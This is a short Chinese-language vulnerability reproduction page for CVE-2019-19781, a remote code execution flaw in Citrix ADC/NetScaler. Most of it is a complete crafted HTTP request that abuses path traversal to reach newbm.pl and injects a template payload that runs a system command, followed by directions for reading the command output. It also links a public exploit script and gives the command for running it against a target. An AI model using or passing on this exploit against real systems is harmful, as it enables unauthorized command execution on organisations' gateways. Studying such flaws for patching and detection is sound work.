Citrix 远程代码执行漏洞复现(CVE-2019-19781)¶
漏洞影响¶
Citrix 13.x,12.1,12.0,11.1,10.5
漏洞复现¶
方法一: 构造如下数据包
POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1
Host: target-ip
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.23.0
NSC_NONCE: nsroot
NSC_USER: ../../../netscaler/portal/templates/15ffbdca
Content-Length: 89
url=http://example.com&title=test&desc=[% template.new('BLOCK' = 'print whoami
') %] 访问/vpn/../vpns/portal/test.xml即可返回命令执行结果 方法二: exp下载:https://codeload.github.com/jas502n/CVE-2019-19781/zip/master
python CVE-2019-19781-Citrix-ADC-Remote-Code-Execution.py https://target-ip 提示代理错误的话,挂本地代理即可。